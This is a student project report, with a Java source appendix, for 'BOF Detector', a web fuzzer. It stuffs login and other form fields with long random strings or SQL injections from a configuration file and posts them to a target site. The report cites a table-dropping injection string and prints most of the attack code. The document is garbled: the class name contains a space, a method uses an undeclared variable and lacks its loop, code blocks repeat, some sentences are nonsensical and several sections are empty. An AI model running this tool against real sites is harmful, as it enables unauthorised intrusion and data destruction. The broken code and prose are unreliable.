Professional Documents
Culture Documents
ACKNOWLEDGEMENTS 1
ABSTRACT 2
PROJECT OVERVIEW
1.1 Buffer overflow 4
1. 1.2 BOF Characteristics 5
1.3 How BOF Testing Works? 5
1.4 Buffer overflow Types 6
1.5 BOF Detector – Web BOFer Concept 7
1.6 Major Operations involved 7
ANALYSIS OF PROJECT
2.1 Main objective 12
2. 2.2 Process Flow Diagram of the System 12
2.3 Need of the Project 13
2.4 Project Features 14
DESIGN OF PROJECT
3.1 Functional Matrix 17
3. 3.2 Flowchart Of The Project 18
3.3 Technology Used 19
6. CONCLUSIONS 36
6.1 Future Progress 38
GLOSSARY 39
2
ABSTRACT
The Project in consideration explains the process of Buffer overflow a Web Portal to
uncover the possible vulnerabilities present due to insecurely written code. BOF
Detector performs a Buffer Overflow analysis to ascertain the presence of validation
within the HTML source file. Also, the application performs persistent SQL Injection
Attack by embedding the designed Username and Password tags within a Login form
with the SQL queries. The modified HTML file is then submitted to the Web Server as
specified in the FORM tag. The responses sent by the Web Server is received and
analyzed by the Application in terms of HTTP Status Codes which are an important
indication for the presence of vulnerability in the computer. Thus, the overall analysis
showcased by the application is a significant benchmark for a website and it is vital
to overcome the presence of such vulnerabilities for a Web Portal Testing Team.
2
CHAPTER 1
PROJECT OVERVIEW
3
Whenever an Input tag in an HTML source file is embedded with a large random String
or a SQL directive and submitted to the HTTP Web Server, the response obtained from
the Web Server in terms of HTTP status codes is a true indication of the state the
machine is present in. It is possible and very likely that a few states would imply the
possible presence of Vulnerability, which would be a likely threat to the Web Portal
when released in the production environment. Thus, Buffer Overflow and SQL Injection
Attack form an important testing paradigm in the overall Web Testing Scenario. Also, a
short “Analysis” detailing the Test performed and the results obtained is an essential part
of the Project.
BOF Testing, in plain terms, is a technique which tries to induce Data Corruption by
attacking an Application or a Web Page with random bad data and the resulting behavior
of the Application is logged. The intended behavior can be either the application manages
to work reasonably well or it breaks down (crashes). BOF testing approach follows no
logic whatsoever. In the case of a Human Tester, an attempt is made to guess as to what
kind of data will result in a crash in the application. In automated BOF testing, random
and gibberish data is provided to a program. Failure state observed by such testing
usually comes as a complete shock to programmers because no logical person would ever
conceive them.
Thus, every BOFer is expected to find different set of bugs. The actual usage of Buffer
overflow is in testing domain. But as BOF testing has become even more well-known,
it can be used as a tool of exploitation by an attacker. It is a similar to Fault
Injection and the random nature of data is not quite helpful in some cases as catching
a boundary value condition with total random inputs is highly unlikely.
4
1.2 BOF Characteristics:
BOFer tools work best for problems that can induce a program to crash, such as Buffer
Overflow, Cross-Site Scripting, Denial Of Service attacks, Format String bugs and SQL
Injection. These traits are often utilized by an attacker on purpose of wreaking the
greatest possible amount of havoc in the least possible time. BOF testing is less effective
for dealing with security threats that do not cause program crashes, such as Spyware,
some Viruses, Worm, Rabbits and Trojan Horse.
BOF testing can often reveal defects that are overlooked when software is written and
debugged. Nevertheless, BOF testing usually finds only the most serious faults. BOF
testing alone cannot provide a complete picture of the overall security, quality or
effectiveness of a program in a particular situation or application. BOFers are most
effective when used in conjunction with extensive alpha testing, beta testing,, black box
testing, and other proven debugging methods.
5
Input File Program Expected
Result
Fuzzer
Categories of Fuzzers
6
1.5 BOF Detector – Web BOFer Concept:
7
1.6 Major Operations involved:
The following are the major operations involved in the Fire BOFer:
8
SQL Injection Attack:
This attack is typically for Login pages where in „Username‟ and „Password‟ is involved.
We get past the Client-Side validation in a way similar to Buffer Overflow Attack. But
instead of embedding a randomly generated String, we read a configuration file named
„inject.conf‟ which has many SQL Injections present in it. The combinations of SQL
injections are read one-by-one and embedded into the „input‟ tag field and Login page is
submitted for every single SQL injection separately. The results are again noted by
observing the HTTP Status codes received as a response whether the attack was a success
or not.
Analysis:
After the Buffer Overflow or SQL Injection attack, an analysis is done and showcased on
the Console pertaining to the attack detailing the different types of HTTP Status codes
and the number of occurrences of each which were found on the whole during the attack.
9
Manually Configurable SQL Injections:
The „inject.conf‟ file is tunable and the Attacker or Tester can add/modify/remove SQL
injections as per his wish. Each SQL injection is used one-by-one from this file and
embedded into the „input‟ tag inside the HTML Web Page and further processing is
initiated.
Successful 2xx: This class of status code suggests that the Client‟s request was
successfully received, understood and accepted.
Redirection 3xx: Such status code showcases that infinite redirection loops do exist
within the Web Form and that further action has to be carried out by the User to fulfill
the Request while you travel.
Client Error 4xx: Such status codes showcases that the Client has caught Exceptions.
Server Error 5xx: Such class of status code showcases that Server has caught some
exception which has occurred and the Client‟s requests cannot be performed.
10
CHAPTER 2
ANALYSIS OF PROJECT
11
2.1 Main objective:
It defines the chief principle of the system to provide a structure around which the design
can be developed.
The purpose of this application is to provide a mechanism for vulnerability detection in
Web Pages. BOF Detector is a Web Site vulnerability detector which rigorously
injects malformed data and SQL injections within the input tag of an HTML source file
fetched from the Web Server. It then analyzes the HTTP status codes received as a
response from the Web Server as a possible indication for hidden vulnerabilities.
There are many BOFers already present in the market written in Perl and Python. BOF
Detector, written exclusively in Java is going to be very popular and can be used by
Web Portal Testing teams before putting their Site into Production.
The Process Flow Diagram is the framework that describes how the system component
interacts and work together to achieve the overall system goals. It describes the system
operation, what each component of the system does and what information is exchanged
amongst the components. The process flow is designed for basically getting an idea of
how the actual system works and operates.
FireFuzzer Remote
User Application Web
server
STAGE 2
12
Figure above shows the process flow design of the FireFuzzer project
Process Flow Diagram Explanation:
There are more than million websites on the Internet. With such a tremendous growth, the
issue of security has achieved a wide angle and is very important due to the following
reasons:
Most of the transactions are
Online Usage of Legacy Code
User Trust factor
Shift in focus of Attacker towards monetary benefits
Poorly written code
There are many more reasons besides these. The security can be maintained by having
Secure Coding practice. But, that is not always the case. Hence, there is a need for an
application tool which would be able to uncover vulnerabilities besides those which are
already well-known. If such vulnerabilities are uncovered, then the security of the
product can be enhanced and guaranteed to a large extent. Software Testers would benefit
tremendously from such a utility. We look into the following categories of errors:
13
2.4 Project Features:
Level Description Entities Involved Operations Involved
0 User Software Tester Passes URL as a parameter for BOF
Attacker Testing
(Hacker/Cracker) For more detailed analysis, „detail‟
parameter can be passed by User in
the command prompt expression
Closely observes the Analysis
obtained from the BOF program for
possible vulnerabilities
1 BOF BOF Detector Fetches the HTML source code for a
Detector Module given URL
Application and external files Generates a Random String using
Java Random class
In the case of Buffer Overflow
Attack, it embeds the Random String
inside the ‟input‟ tag field of the
HTML source file
Submits the form with the embedded
random String
In the case of SQL Injection Attack, it
fetches SQL Injections from a
inject.conf file and embeds those into
the „input‟ tags of the „LOGIN‟ forms
and submits the form
Receives the HTTP Status Code
response from the Server
Showcases Analysis by categorizing
the HTTP Status Code responses
Can show Server Response by using
the „detail‟ parameter while executing
the application
14
2 Remote HTTP Web Server, Acknowledges the HTTP request
Web Server Database Server, from the HTTP client program
etc. Responds by sending the requested
Web Page
Upon receiving the submitted form
using the POST method, it processes
the information received.
Due to the information received from
the HTTP Client, the Server can
either work properly or can crash (due
to the mangled data sent in SQL
Injection or Buffer Overflow Attack)
Sends back the response along with
HTTP Status Code
15
CHAPTER 3
DESIGN OF PROJECT
16
3.1 Functional Matrix:
<Tabulation done on basis of Input to Actors involved>
17
3.2 Flowchart of the Project:
Start
FireFuzzer does
TCP handshake to
establish connection
with Web Server
Connection
Established
18
3.3 Technology Used:
Java 1.6.07
Java was the backbone of our project. With the latest release of version 1.6, the Scanner
class is phenomenal and it makes life so much easier rather than using the
StringTokenizer class. As we all know, the Java programming language is a Sun
Microsystems propriety product and is a major open source technology which is used
widely in all disciplines of technology and application development. Java technology's
versatility, efficiency, platform portability, and security make it the ideal technology for
network computing. From laptops to datacenters, game consoles to scientific
supercomputers, cell phones to the Internet, Java is everywhere! The statistics available
from Sun Microsystems website states that Java powers more than 4.5 billion devices
including PC‟s, mobile phones, smart cards, printers, car navigation, medical devices, etc.
19
Eclipse 3.4.2
Eclipse was the default IDE of our choice due to the Open Source movement. The
intuitive programming environment is really helpful especially with the large number of
extensible features provided. The plug-ins support is probably the biggest feature of
Eclipse and it allows the user to add more and more technology and components and
work on different environments. In its default form, Eclipse supports Java and consists of
large number of Java Development Tools (JDT). Eclipse currently supports more than
100 programming languages as plug-ins and this number keeps growing by the day.
The Jakarta Components including HTTPComponent was a boon for us as we could work
with the HTTP Headers very easily. It was because of HTTPComponents that we were
able to submit the forms with mangled data to the Web Server and understand the Status
Codes sent as a response to the Client. The Hyper-Text Transfer Protocol (HTTP) is
perhaps the most significant protocol used on the Internet today and HttpComponents
play a big role while building HTTP-aware client and server applications such as web
browsers, web spiders, HTTP proxies, web service transport libraries, or systems that
leverage or extend the HTTP protocol for distributed communication.
20
CHAPTER 5
TIME LINE AND TASK DISTRIBUTION
21
Gantt Chart:
22
CHAPTER 5
RESULTS AND DISCUSSION
23
5. 1 Progress:
Project Proposal
Analysis of
existing Fuzzers
Functional Matrix
Testing
Documentation
Figure showing the Progressive Stages performed during our entire Project
24
Project Proposal:
This was the first step in our project endeavor. We did Requirement Analysis
regarding the kind of data we are going to interact with in the Input file and
what actions we need to undertake over that very data.
Functional Matrix:
It basically consists of 3 columns comprising of Input, Process and Output.
The Input at each Entity undergoes certain processing which is displayed at
the Output. Also, it helped us in gathering the complete know-how about the
features and concepts pertaining to each Entity and their requirements
Analysis of Existing BOFers:
There are several BOFers which are implemented and it was important for us
to understand how they approach the problem of unearthing vulnerabilities in
Software Applications. We tried to map a similar approach as used in
„PowerBOFer‟.
Flowcharts:
The flowchart is used to show the flow of processes between entities. It also
showcased the conditional events which helped to reach different conclusions
at the end.
Implementing BOF Detector using JDK 1.6:
Java was the default choice of programming language for working on the
Project. It has many extensible classes which help in Socket programming and
String Manipulations among others which was required on a large scale in the
project.
Utilizing 3rd Party components:
We made use of Apache Jakarta Jars and Jericho Parser for the purpose of
resubmission of Web Forms, extracting the information pertaining to HTTP
Status Code and parsing the HTML source file respectively.
Testing:
This helped us in performing various tests on our system. It suggested the
success or failure of the various the components.
Documentation:
In Documentation, we prepared Presentation slides, Final Project Report and
also the packing along with makefile for Project Deployment.
25
5.2 Screenshots: (UNDERSTANDING BUFFER OVERFLOW)
26
Step 3: We choose to perform Buffer Overflow by using the parameter ‘buffer’
Step 4: We can see the Buffer Overflow attack and one 5xx Server Error is
reported as shown above
27
Step 5: Observe the detail view in Buffer Overflow by using ‘detail’ parameter
28
Step 7: Final Analysis in Buffer Overflow done using detailed view
29
(UNDERSTANDING SQL INJECTION)
30
Step 3: An Internel Server Error Encountered due to a SQL injection namely
‘; drop tables –
31
5.3 Validation:
32
Step 1: We wish to pass ‘buff’ which is a wrong parameter to the Program
(correct should be ‘buffer’)
33
Step 1: Our program runs only for http connections and not for https.
https://cubmail.cc.columbia.edu is also handled as shown below
34
5.4 Hardware and Software Requirement:
HARDWARE:
Number Description Alternatives (if available)
SOFTWARE:
Number Description Alternatives (if applicable)
35
CHAPTER 6
CONCLUSION
36
BOF Detector showcases the vulnerabilities in typical Web sites. As per our tests,
we have proven that if these vulnerabilities come in the knowledge of Attackers
then exploitation of vulnerabilities will not take much time.
It also showcases the need for much improved and secure coding standard. Even
though a secure coding mode exists – Security Development Life Cycle, it is still
being implemented in a phased manner. That might be because corporations have not
realized it‟s importance yet.
But, it is indeed time to use penetration testing tools such as BOF Detector and the
other likes which do exist to become aware of the vulnerabilities before putting the
system into production environment. Thus, early adoption of secure coding
practice would ensure proper Security (Confidentiality, Availability and Integrity)
from Attackers, who might use such penetration testing tools which are brute-force
implementations to fulfill their evil desires.
37
6.1 Future Scope
38
GLOSSARY
Buffer Overflow: It occurs when a program tries to write more data than
what the buffer can store.
39
REFERENCES
40
APPENDIX
BOF
Detector.java:
package org.BOF
Detector.Fire; import
java.io.*;
import java.net.*;
import java.util.*;
/**
*
*/
/**
* Main Class of the Project
* */
public class BOF Detector {
private URL fURL;
/**
* Constructor checks the URL and acertains whether it is HTTP or not
* */
public BOF Detector(URL aURL) {
if ( ! "http".equals(aURL.getProtocol())) {
throw new IllegalArgumentException("URL is not for HTTP Protocol" +
": " + aURL);
}
fURL = aURL;
}
/**
* Constructor checks whether the URL is malformed or not
* */
public BOF Detector( String aUrlName ) throws MalformedURLException
{ this ( new URL(aUrlName) );
}
/**
* Fetches the HTML source file from a given URL
* */
public String getPageContent() throws IOException {
String result = null;
URLConnection connection = null;
try {
connection = fURL.openConnection();
Scanner scanner = new Scanner(connection.getInputStream());
scanner.useDelimiter("\\Z");
result = scanner.next();
}
catch ( IOException ex ) {
log("Cannot open connection to " + fURL.toString());
}
return result;
}
/**
* Logs the incoming HTML source infomation into a file
* */
private static void log(Object aObject) {
41
try {
42
FileWriter fww = new FileWriter("page.loaded");
fww.close();
FileWriter fw = new FileWriter("page.loaded",true);
fw.append(aObject.toString());
fw.close();
}
catch(Exception e) {
System.err.println("Exception occured: "+e.getMessage());
}
}
/**
* Main function of the Project to start either Buffer Overflow
* or SQL Injection Attack on the target URL
* */
public static void main(String []args) throws IOException,
InterruptedException {
System.out.println("");
System.out.println("\t8888888888 8888888 8888888b. 8888888888 8888888888 888
888 8888888888P 8888888888P 8888888888 8888888b.");
System.out.println("\t888 888 888 Y88b 888 888 888 888 d88P
d88P 888 888 Y88b ");
System.out.println("\t888 888 888 888 888 888 888 888 d88P
d88P 888 888 888 ");
System.out.println("\t8888888 888 888 d88P 8888888 8888888 888 888
d88P d88P 8888888 888 d88P ");
System.out.println("\t888 888 8888888P\" 888 888 888 888 d88P
d88P 888 8888888P\" ");
System.out.println("\t888 888 888 T88b 888 888 888 888 d88P
d88P 888 888 T88b ");
System.out.println("\t888 888 888 T88b 888 888 Y88b. .d88P d88P
d88P 888 888 T88b");
System.out.println("\t888 8888888 888 T88b 8888888888 888 \"Y88888P\"
d8888888888 d8888888888 8888888888 888 T88b ");
System.out.println("");
Thread.sleep(1000);
String url = null;
if(args.length==2 || args.length==3) {
url = args[0];
}
else {
System.err.println("Incorrect number of parameters");
System.err.println("Syntax is java BOF Detector <url> <buffer/sql>
<detail(OPTIONAL)>");
System.exit(0);
}
if(args[1].equalsIgnoreCase("buffer") || args[1].equalsIgnoreCase("sql")) {}
else {
System.err.println("Incorrect parameters entered");
System.err.println("Syntax is java BOF Detector <url> <buffer/sql>
<detail(OPTIONAL)>");
System.exit(0);
}
if(args.length==3) {
if(args[2].equalsIgnoreCase("detail")) {}
else {
System.err.println("Incorrect parameters entered");
System.err.println("Syntax is java BOF Detector <url> <buffer/sql>
<detail(OPTIONAL)>");
43
System.exit(0);
}
}
if(url.contains("http://")) {}
else if(url.startsWith("www."))
url="http://"+url;
else {
System.out.println("Only http protocol based sites are handled. Wait for future
release.");
System.exit(0);
}
new File("page.loaded").deleteOnExit();
new File("temp.html").deleteOnExit();
System.out.println("#########################################################
###############################################################");
System.out.println("Targeted URL: "+url);
System.out.println("#########################################################
###############################################################");
BOF Detector fetcher = new BOF Detector(url);
log(fetcher.getPageContent());
if(args[1].equalsIgnoreCase("buffer")) {
BufferOverflow bo = new BufferOverflow();
if(args.length==3)
if(args[2].equalsIgnoreCase("detail"))
bo.globalDetailFlag = true;
bo.globalURL=url;
System.out.println("<---BUFFER OVERFLOW ATTACK--->");
System.out.println("#########################################################
###############################################################");
bo.parseInput();
bo.analyzeBufferOverflow();
}
else if(args[1].equalsIgnoreCase("sql")) {
SQLInjection sql = new SQLInjection();
if(args.length==3)
if(args[2].equalsIgnoreCase("detail"))
sql.globalDetailFlag = true;
sql.globalURL=url;
System.out.println("<---SQL INJECTION ATTACK--->");
System.out.println("#########################################################
###############################################################");
sql.parseInput();
sql.analyzeSQLInjection();
}
}
}
44
SQLInjection.java:
package org.BOF Detector.Fire;
import java.io.BufferedReader;
import java.io.FileNotFoundException;
import java.io.FileReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.io.UnsupportedEncodingException;
import java.net.MalformedURLException;
import java.net.URLEncoder;
import java.util.List;
import java.util.StringTokenizer;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import net.htmlparser.jericho.Attributes;
import net.htmlparser.jericho.HTMLElementName;
import net.htmlparser.jericho.Source;
import net.htmlparser.jericho.StartTag;
import org.apache.commons.httpclient.HttpClient;
import org.apache.commons.httpclient.HttpStatus;
import org.apache.commons.httpclient.methods.PostMethod;
class SQLInjection {
private static int countForms = 0;
private static int countInputs = 0;
private static String var;
private static int []arrayBuffer = new int[5];
public static String globalURL;
public static boolean globalDetailFlag = false;
public static boolean flipFlop = false;
/**
* Initializes the Array
* */
public SQLInjection() {
for(int i=0;i<arrayBuffer.length;i++) {
arrayBuffer[i]=0;
}
}
/**
*Performs analysis over SQL Injection and showcases the result to the User
*/
public static void analyzeSQLInjection() {
System.out.println("###########################################################
#############################################################");
System.out.println("<---SQL INJECTION ANALYSIS--->");
System.out.println("Total # of Forms: "+countForms);
System.out.println("<<-Categorizing the available data on basis of HTTP Status Codes-
>>");
System.out.println("Informational Codes 1xx Series: "+arrayBuffer[0]);
System.out.println("Successful Client Interaction related 2xx Series: "+arrayBuffer[1]);
System.out.println("Redirection related 3xx Series: "+arrayBuffer[2]);
System.out.println("Client Error related 4xx Series: "+arrayBuffer[3]);
System.out.println("Server Error related 5xx Series: "+arrayBuffer[4]);
System.out.println("###########################################################
#############################################################");
45
System.out.println("###########################################################
#############################################################");
System.out.println("For more Information on HTTP Status Code Series, refer the
'HTTP_STATUS_CODE.pdf' in Document folder.");
System.out.println("###########################################################
#############################################################");
}
/**
* Traverses over the HTML source file and embeds it with huge sounds
* */
private static void sendBack(String data) throws MalformedURLException,IOException
{ HttpClient client = new HttpClient();
client.getParams().setParameter("http.useragent", "Mozilla/5.0 (X11; U; Linux i686; en-
US; rv:1.9.0.10) Gecko/2009042708 Fedora/3.0.10-1.fc10 Firefox/3.0.10");
if(globalDetailFlag==true)
System.out.println("URL: "+var);
PostMethod method = new PostMethod(var);
BufferedReader br = null;
StringTokenizer str = new StringTokenizer(data,"#");
countInputs+=str.countTokens();
while(str.hasMoreTokens()) {
StringTokenizer strr = new StringTokenizer(str.nextToken(),",");
String attrib = strr.nextToken();
String value = strr.nextToken();
method.addParameter(attrib,value);
}
try{
//System.out.println(method.getResponseHeaders());
int returnCode = client.executeMethod(method);
if(globalDetailFlag==true)
System.out.println("Status: "+method.getStatusCode());
arrayBuffer[(method.getStatusCode()/100)-1]++;
if(returnCode == HttpStatus.SC_NOT_IMPLEMENTED) {
System.err.println("The Post method is not implemented by this URI");
method.getResponseBodyAsString();
}
else {
br = new BufferedReader(new
InputStreamReader(method.getResponseBodyAsStream()));
String readLine;
PrintWriter pw = new PrintWriter("temp.html");
pw.println("Address: "+var);
while(((readLine = br.readLine()) != null)) {
pw.println(readLine);
pw.flush();
}
}
}
catch (Exception e) {
System.err.println(e);
}
finally {
//new ProcessBuilder("firefox", "temp.html").start();
method.releaseConnection();
if(br != null)
46
try {
br.close();
}
catch (Exception fe) {}
}
}
/**
* Parses the HTML source input file and populates the List data structure*/
public static void parseInput() throws IOException{
Source source = null;
try {
source = new Source(new FileReader("page.loaded"));
}
catch (FileNotFoundException fnfe) {
System.err.println("File not found. Error: "+fnfe.getMessage());
}
catch (IOException ioe) {
System.err.println("IOException occurred. Error: "+ioe.getMessage());
}
int currentLoop = 0;
int currentForm = 0;
List<StartTag> branches=source.getAllStartTags(HTMLElementName.FORM);
countForms = branches.size();
System.out.println("###########################################################
#############################################################");
Attributes attr;
String s="",data = "";
String str = "",pattern = "",temp = "";
String[] tempStr = null;
Attributes attributes=startTag.getAttributes();
String random = s;
String rel=attributes.getValue("type");
if(rel==null)
continue;
if(rel.equalsIgnoreCase("text") ||/* rel.equalsIgnoreCase("hidden") ||
*/rel.equalsIgnoreCase("password")) {
str = startTag.toString();
47
if(str.contains("value")) {
String atrString = attributes.toString();
StringTokenizer strAtr = new StringTokenizer(atrString);
String strtag = "<input ";
while(strAtr.hasMoreTokens()) {
String strA = strAtr.nextToken();
if(!strA.contains("value")) {
strtag = strtag+strA+" ";
}
}
strtag=strtag+"value=\""+random+"\"/>";
temp=strtag;
}
else {
pattern = "/>";
Pattern p = Pattern.compile(pattern);
Matcher m = null;
if(p.matcher(str).find()) {
tempStr = str.split(" ");
int last = tempStr.length-1;
pattern = "/>";
String replace = " value=\""+random+"\"/>";
p = Pattern.compile(pattern);
m = p.matcher(tempStr[last]);
tempStr[last]=m.replaceFirst(replace);
temp="";
for(int j=0;j<tempStr.length;j++)
temp = temp+tempStr[j]+" ";
}
else {
tempStr = str.split(" ");
int last = tempStr.length-1;
pattern = ">";
String replace = " value=\""+random+"\"/>";
p = Pattern.compile(pattern);
m = p.matcher(tempStr[last]);
tempStr[last]=m.replaceFirst(replace);
temp="";
for(int j=0;j<tempStr.length;j++)
temp = temp+tempStr[j]+" ";
}
}
try {
data+=URLEncoder.encode(attributes.getValue("name"),"UTF-8")+ "," +
URLEncoder.encode(random, "UTF-8")+"#";
}
catch(UnsupportedEncodingException uee) {
System.err.println("Unsupported error");
}
}
}
var=attr.getValue("action");
if(var==null || var.equals("")) {
System.err.println("No URL specified in FORM TAG-ACTION field");
continue;
}
if(var.charAt(0)=='/') {
var=globalURL+var;
}
else if(!var.contains("http") & !var.contains("https")& !var.contains("www")) {
48
int ind=globalURL.lastIndexOf("/");
int cind=globalURL.lastIndexOf("//");
String rt;
if(ind==cind+1) {
rt=globalURL;
}
else {
rt=globalURL.substring(0,ind);
}
var=rt+'/'+var;
}
if(globalDetailFlag==true) {
System.out.println("data: "+data);
System.out.println("SQL Injection #: "+currentLoop);
}
if(globalDetailFlag==false)
if(flipFlop==false) {
System.out.println(">>");
flipFlop=true;
}
else {
System.out.println("<<");
flipFlop=false;
}
sendBack(data);
if(globalDetailFlag==true)
System.out.println("###########################################################
#############################################################");
}
}
}
}
}
49
BufferOverflow.java:
package org.BOF Detector.Fire;
import java.io.BufferedReader;
import java.io.FileNotFoundException;
import java.io.FileReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.io.UnsupportedEncodingException;
import java.net.MalformedURLException;
import java.net.URLEncoder;
import java.util.List;
import java.util.Random;
import java.util.StringTokenizer;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import net.htmlparser.jericho.Attributes;
import net.htmlparser.jericho.HTMLElementName;
import net.htmlparser.jericho.OutputDocument;
import net.htmlparser.jericho.Source;
import net.htmlparser.jericho.StartTag;
import org.apache.commons.httpclient.HttpClient;
import org.apache.commons.httpclient.HttpStatus;
import org.apache.commons.httpclient.methods.PostMethod;
class BufferOverflow {
private static int countForms = 0;
private static int countInputs = 0;
private static String var;
private static int []arrayBuffer = new int[5];
public static String globalURL;
public static boolean globalDetailFlag = false;
public static boolean flipFlop = false;
/**
* Initialize the Array
* */
public BufferOverflow() {
for(int i=0;i<arrayBuffer.length;i++) {
arrayBuffer[i]=0;
}
}
/**
* Showcases the analysis of Buffer Overflow
* */
public static void analyzeBufferOverflow() {
System.out.println("###########################################################
#############################################################");
System.out.println("<---BUFFER OVERFLOW ANALYSIS--->");
System.out.println("Total # of Forms: "+countForms);
System.out.println("Total # of Input tags: "+countInputs);
System.out.println("<<-Categorizing the available data on basis of HTTP Status Codes-
>>");
System.out.println("Informational Codes 1xx Series: "+arrayBuffer[0]);
System.out.println("Successful Client Interaction related 2xx Series: "+arrayBuffer[1]);
System.out.println("Redirection related 3xx Series: "+arrayBuffer[2]);
System.out.println("Client Error related 4xx Series: "+arrayBuffer[3]);
System.out.println("Server Error related 5xx Series: "+arrayBuffer[4]);
50
System.out.println("###########################################################
#############################################################");
System.out.println("###########################################################
#############################################################");
System.out.println("For more Information on HTTP Status Code Series, refer the
'HTTP_STATUS_CODE.pdf' in Document folder.");
System.out.println("###########################################################
#############################################################");
}
/**
* Traverses over the HTML source file and embeds random String into the
* value of the 'input' tag*/
private static void sendBack(String data) throws MalformedURLException,IOException
{ HttpClient client = new HttpClient();
client.getParams().setParameter("http.useragent", "Mozilla/5.0 (X11; U; Linux i686; en-
US; rv:1.9.0.10) Gecko/2009042708 Fedora/3.0.10-1.fc10 Firefox/3.0.10");
if(globalDetailFlag==true) {
System.out.println("URL: "+var);
System.out.println("Data passed: "+data);
}
50
finally {
//new ProcessBuilder("firefox", "temp.html").start();
method.releaseConnection();
if(br != null)
try {
br.close();
}
catch (Exception fe) {}
}
}
/**
* Randomly generates a long String
* */
private static String randomizer() {
String str1=new
String("QAa0bcLdUK2eHfJgTP8XhiFj61DOklNm9nBoI5pGqYVrs3CtSuMZvwWx4yE7zR");
StringBuffer sb=new StringBuffer();
Random r = new Random();
int te=0;
for(int i=1;i<=300;i++){
te=r.nextInt(62);
sb.append(str1.charAt(te));
}
String token1 = sb.toString();
return token1;
}
/**Parses over the HTML file and populates the List data structure*/
public static void parseInput() throws IOException{
Source source = null;
try {
source = new Source(new FileReader("page.loaded"));
}
catch (FileNotFoundException fnfe) {
System.err.println("File not found. Error: "+fnfe.getMessage());
}
catch (IOException ioe) {
System.err.println("IOException occurred. Error: "+ioe.getMessage());
}
int currentForm = 0;
List<StartTag> branches=source.getAllStartTags(HTMLElementName.FORM);
countForms = branches.size();
System.out.println("###########################################################
#############################################################");
Attributes attr;
String data = "";
String str = "",pattern = "",temp = "";
String[] tempStr = null;
for(StartTag sj:branches) {
currentForm++;
attr=sj.getAttributes();
data="";
List<StartTag> segments = sj.getElement().getAllStartTags(HTMLElementName.INPUT);
str = "";
pattern = "";
temp = "";
tempStr = null;
boolean radioSelect = false;
boolean checkSelect = false;
for (StartTag startTag : segments) {
str = "";
51
temp="";
Attributes attributes=startTag.getAttributes();
String random = randomizer();
String rel=attributes.getValue("type");
if(rel==null)
continue;
if(rel.equalsIgnoreCase("text") || rel.equalsIgnoreCase("hidden") ||
rel.equalsIgnoreCase("password")) {
str = startTag.toString();
if(str.contains("value")) {
String atrString = attributes.toString();
StringTokenizer strAtr = new StringTokenizer(atrString);
String strtag = "<input ";
while(strAtr.hasMoreTokens()) {
String strA = strAtr.nextToken();
if(!strA.contains("value")) {
strtag = strtag+strA+" ";
}
}
strtag=strtag+"value=\""+random+"\"/>";
temp=strtag;
}
else {
pattern = "/>";
Pattern p = Pattern.compile(pattern);
Matcher m = null;
if(p.matcher(str).find()) {
tempStr = str.split(" ");
int last = tempStr.length-1;
pattern = "/>";
String replace = " value=\""+random+"\"/>";
p = Pattern.compile(pattern);
m = p.matcher(tempStr[last]);
tempStr[last]=m.replaceFirst(replace);
temp="";
for(int j=0;j<tempStr.length;j++)
temp = temp+tempStr[j]+" ";
}
else {
tempStr = str.split(" ");
int last = tempStr.length-1;
pattern = ">";
String replace = " value=\""+random+"\"/>";
p = Pattern.compile(pattern);
m = p.matcher(tempStr[last]);
tempStr[last]=m.replaceFirst(replace);
temp="";
for(int j=0;j<tempStr.length;j++)
temp = temp+tempStr[j]+" ";
}
}
try {
data+=URLEncoder.encode(attributes.getValue("name"),"UTF-8")+ "," +
URLEncoder.encode(random, "UTF-8")+"#";
}
catch(UnsupportedEncodingException uee) {
System.err.println("Unsupported error");
}
}
else if(rel.equalsIgnoreCase("radio") && radioSelect==false) {
52
radioSelect=true;
str = startTag.toString();
if(str.contains("checked")) {
String atrString = attributes.toString();
StringTokenizer strAtr = new StringTokenizer(atrString);
String strtag = "<input ";
while(strAtr.hasMoreTokens()) {
String strA = strAtr.nextToken();
if(!strA.contains("")) {
strtag = strtag+strA+" ";
}
}
strtag=strtag+"value=\""+randomizer()+"\"/>";
temp=strtag;
System.out.println("Line: "+rel+" is checked");
}
else {
pattern = "/>";
Pattern p = Pattern.compile(pattern);
Matcher m = null;
if(p.matcher(str).find()) {
tempStr = str.split(" ");
int last = tempStr.length-1;
pattern = "/>";
String replace = " checked/>";
p = Pattern.compile(pattern);
m = p.matcher(tempStr[last]);
tempStr[last]=m.replaceFirst(replace);
temp="";
for(int j=0;j<tempStr.length;j++)
temp = temp+tempStr[j]+" ";
}
else {
tempStr = str.split(" ");
int last = tempStr.length-1;
pattern = ">";
String replace = " checked/>";
p = Pattern.compile(pattern);
m = p.matcher(tempStr[last]);
tempStr[last]=m.replaceFirst(replace);
temp="";
for(int j=0;j<tempStr.length;j++)
temp = temp+tempStr[j]+" ";
}
}
try {
data+=URLEncoder.encode(attributes.getValue("name"),"UTF-8")+ "," +
URLEncoder.encode("checked", "UTF-8")+"#";
}
catch(UnsupportedEncodingException uee) {
System.err.println("Unsupported error");
}
}
else if(rel.equalsIgnoreCase("checkbox")) {
str = startTag.toString();
if(str.contains("checked")) {
String atrString = attributes.toString();
StringTokenizer strAtr = new StringTokenizer(atrString);
String strtag = "<input ";
while(strAtr.hasMoreTokens()) {
53
String strA = strAtr.nextToken();
if(!strA.contains("")) {
strtag = strtag+strA+" ";
}
}
strtag=strtag+"value=\""+randomizer()+"\"/>";
temp=strtag;
System.out.println("Line: "+rel+" is checked");
}
else {
pattern = "/>";
Pattern p = Pattern.compile(pattern);
Matcher m = null;
if(p.matcher(str).find()) {
tempStr = str.split(" ");
int last = tempStr.length-1;
pattern = "/>";
String replace = " checked/>";
p = Pattern.compile(pattern);
m = p.matcher(tempStr[last]);
tempStr[last]=m.replaceFirst(replace);
temp="";
for(int j=0;j<tempStr.length;j++)
temp = temp+tempStr[j]+" ";
}
else {
tempStr = str.split(" ");
int last = tempStr.length-1;
pattern = ">";
String replace = " checked/>";
p = Pattern.compile(pattern);
m = p.matcher(tempStr[last]);
tempStr[last]=m.replaceFirst(replace);
temp="";
for(int j=0;j<tempStr.length;j++)
temp = temp+tempStr[j]+" ";
}
}
try {
data+=URLEncoder.encode(attributes.getValue("name"),"UTF-8")+ "," +
URLEncoder.encode("checked", "UTF-8")+"#";
}
catch(UnsupportedEncodingException uee) {
System.err.println("Unsupported error");
}
}
}
var=attr.getValue("action");
//new FileWriter("temp.html").append(var);
if(var==null || var.equals("")) {
continue;
